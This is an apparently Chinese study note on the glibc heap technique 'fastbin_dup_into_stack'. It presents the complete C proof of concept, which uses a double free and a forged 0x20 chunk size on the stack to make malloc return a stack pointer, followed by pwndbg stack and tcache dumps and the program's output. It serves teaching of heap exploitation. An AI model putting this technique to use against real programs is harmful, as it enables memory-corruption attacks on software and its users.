fastbin

fastbin"/>

fastbin

源码如下

int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");
    unsigned long long stack_var;
    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);
    fprintf(stderr, "Freeing the first one...\n");
    free(a);
    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);
    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);
    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);
    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    unsigned long long *d = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", d);
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    stack_var = 0x20;
    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

In file: /ctf/work/fastbin_dup_into_stack.c
   22     free(b);
   23     fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
   24     free(a);
   25     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
   26         "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
 ► 27     unsigned long long *d = malloc(8);
   28     fprintf(stderr, "1st malloc(8): %p\n", d);
   29     fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
   30     fprintf(stderr, "Now the free list has [ %p ].\n", a);
   31     fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
   32         "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp  0x7ffc9567e120 —▸ 0x7f9f57a149a0 (_dl_fini) ◂— push   rbp
01:0008│      0x7ffc9567e128 —▸ 0x55750a93b260 —▸ 0x55750a93b280 ◂— 0x55750a93b260
02:0010│      0x7ffc9567e130 —▸ 0x55750a93b280 —▸ 0x55750a93b260 ◂— 0x55750a93b280
03:0018│      0x7ffc9567e138 —▸ 0x55750a93b2a0 ◂— 0x0
04:0020│      0x7ffc9567e140 —▸ 0x7ffc9567e230 ◂— 0x1
05:0028│      0x7ffc9567e148 ◂— 0x8c79f101a3a09e00
06:0030│ rbp  0x7ffc9567e150 —▸ 0x55750a12dae0 (__libc_csu_init) ◂— push   r15
07:0038│      0x7ffc9567e158 —▸ 0x7f9f57634b97 (__libc_start_main+231) ◂— mov    edi, eax
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
 ► f 0     55750a12d9a4 main+474
   f 1     7f9f57634b97 __libc_start_main+231
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bins
tcachebins
0x20 [  3]: 0x55750a93b260 —▸ 0x55750a93b280 ◂— 0x55750a93b260
标准Double free链表如上

In file: /ctf/work/fastbin_dup_into_stack.c
   34         "return a pointer to it.\n", a);
   35     stack_var = 0x20;
   36     fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
   37     *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
   38     fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
 ► 39     fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
   40 }
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp  0x7ffc9567e120 ◂— 0x20 /* ' ' */
01:0008│      0x7ffc9567e128 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— mov    edi, 8
02:0010│      0x7ffc9567e130 —▸ 0x55750a93b280 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— ...
03:0018│      0x7ffc9567e138 —▸ 0x55750a93b2a0 ◂— 0x0
04:0020│      0x7ffc9567e140 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— mov    edi, 8
05:0028│      0x7ffc9567e148 ◂— 0x8c79f101a3a09e00
06:0030│ rbp  0x7ffc9567e150 —▸ 0x55750a12dae0 (__libc_csu_init) ◂— push   r15
07:0038│      0x7ffc9567e158 —▸ 0x7f9f57634b97 (__libc_start_main+231) ◂— mov    edi, eax
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
 ► f 0     55750a12da98 main+718
   f 1     7f9f57634b97 __libc_start_main+231
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bins
tcachebins
0x20 [  0]: 0x7ffc9567e118

如上代码伪造chunk大小，使其通过验证malloc返回栈指针0x7ffc9567e118 

完整运行结果如下

This file extends on fastbin_dup.c by tricking malloc into
returning a pointer to a controlled location (in this case, the stack).
The address we want malloc() to return is 0x7ffe87d0e8d8.
Allocating 3 buffers.
1st malloc(8): 0x556e60d82260
2nd malloc(8): 0x556e60d82280
3rd malloc(8): 0x556e60d822a0
Freeing the first one...
If we free 0x556e60d82260 again, things will crash because 0x556e60d82260 is at the top of the free list.
So, instead, we'll free 0x556e60d82280.
Now, we can free 0x556e60d82260 again, since it's not the head of the free list.
Now the free list has [ 0x556e60d82260, 0x556e60d82280, 0x556e60d82260 ]. We'll now carry out our attack by modifying data at 0x556e60d82260.
1st malloc(8): 0x556e60d82260
2nd malloc(8): 0x556e60d82280
Now the free list has [ 0x556e60d82260 ].
Now, we have access to 0x556e60d82260 while it remains at the head of the free list.
so now we are writing a fake free size (in this case, 0x20) to the stack,
so that malloc will think there is a free chunk there and agree to
return a pointer to it.
Now, we overwrite the first 8 bytes of the data at 0x556e60d82260 to point right before the 0x20.
3rd malloc(8): 0x556e60d82260, putting the stack address on the free list
4th malloc(8): 0x7ffe87d0e8c8